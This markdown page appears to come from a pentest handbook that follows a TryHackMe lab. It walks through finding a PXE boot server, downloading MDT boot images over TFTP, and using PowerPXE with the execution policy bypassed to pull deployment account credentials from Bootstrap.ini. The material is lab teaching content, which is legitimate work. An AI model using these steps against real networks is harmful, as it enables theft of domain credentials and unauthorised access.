handbook/tools/5.Machine/3.Active-Directory/General/Exploitation/2.Breaching-AD/4.MDT-and-SCCM-PXE-Boot-Image.md

84 lines
4 KiB
Markdown
Raw Permalink Normal View History

2024-08-30 23:07:22 +00:00
## General
MDT (Microsoft Deployment Toolkit) and SCCM (System Center Configuration Manager) are tools that are used to deploy and manage operating systems, applications, and other software in a network environment. A PXE (Preboot eXecution Environment) boot image is a type of boot image that is used to boot a computer over the network and perform various tasks, such as installing an operating system.
An attacker may attempt to exploit MDT or SCCM by compromising the PXE boot image and using it to gain unauthorized access to a system. For example, an attacker could modify the PXE boot image to include malicious code or to redirect the computer to a rogue server. If the attacker is successful, they may be able to gain access to the system and potentially compromise it.
## Commands
## PXE Boot Image Retrieval
Discover the DHCP IP (To find the PXE boot server)
```
nmap -sU -p 67 --script=dhcp-discover <network_range>
```
'---> Network Range ---> /16 /24...
DHCP Explaination
Dynamic Host Configuration Protocol (DHCP) is a network protocol that is used to enable automatic assignment of IP addresses and other related network configuration parameters to devices on a network. The DHCP server maintains a pool of available IP addresses and assigns them to devices on the network as needed. This helps to simplify network configuration and management, as it allows devices to be connected to the network without the need to manually configure their network settings.
Discover the PXEboot Server (On powershell | Need a windows machine in local network)
```
nslookup ---> This will start the nslookup utility
set type=ptr
_pxe._tcp.IP_OF_DHCP_PREVIOUSLY_DISCOVER Replace
# If the DHCP server is configured to provide the PXE server's hostname or IP address, `nslookup` will display the result of the query. The output will show the hostname or IP address of the PXE server.
```
Access the webserver
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/6093e17fa004d20049b6933e/room-content/63264e3ddce1a8b438a7c8b6d527688c.png)
To ensure that all users of the network can use SSH, start by creating a folder with your username and copying the powerpxe repo into this folder:
SSH Command Prompt (Create directory)
```markup
C:\Users\THM>cd Documents
C:\Users\THM\Documents> mkdir <username>
C:\Users\THM\Documents> copy C:\powerpxe <username>\
C:\Users\THM\Documents\> cd <username>
```
Downloading our BCD file to read the configuration of the MDT server (Powershell)
```markup
C:\Users\THM\Documents\USER> tftp -i <MDT_IP> GET "\Tmp\x64{39...28}.bcd" conf.bcd
```
- You will have to lookup THMMDT IP with `nslookup mdt.x.something.com`.
With the BCD file now recovered, we will be using [powerpxe](https://github.com/wavestone-cdt/powerpxe) to read its contents.
More about Powerpxe
Powerpxe is a PowerShell script that automatically performs this type of attack but usually with varying results, so it is better to perform a manual approach. We will use the Get-WimFile function of powerpxe to recover the locations of the PXE Boot images from the BCD file:
Execute Powerpxe (Note that you need to import that powershell script on the machine)
```markup
powershell -executionpolicy bypass
Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : <PXE Boot Image Location>
<PXE Boot Image Location>
```
WIM files are bootable images in the Windows Imaging Format (WIM). Now that we have the location of the PXE Boot image, we can again use TFTP to download this image:
```markup
PS C:\Users\THM\Documents\am0> tftp -i <MDT IP> GET "<PXE Boot Image Location>" pxeboot.wim
```
## Recovering Credentials from a PXE Boot Image
Exfiltrate stored credentials
```markup
Get-FindCredentials -WimFile pxeboot.wim
>> Open pxeboot.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\THMMDT\MTDBuildLab$
>>>> >>>> UserID = <account>
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = <password>
```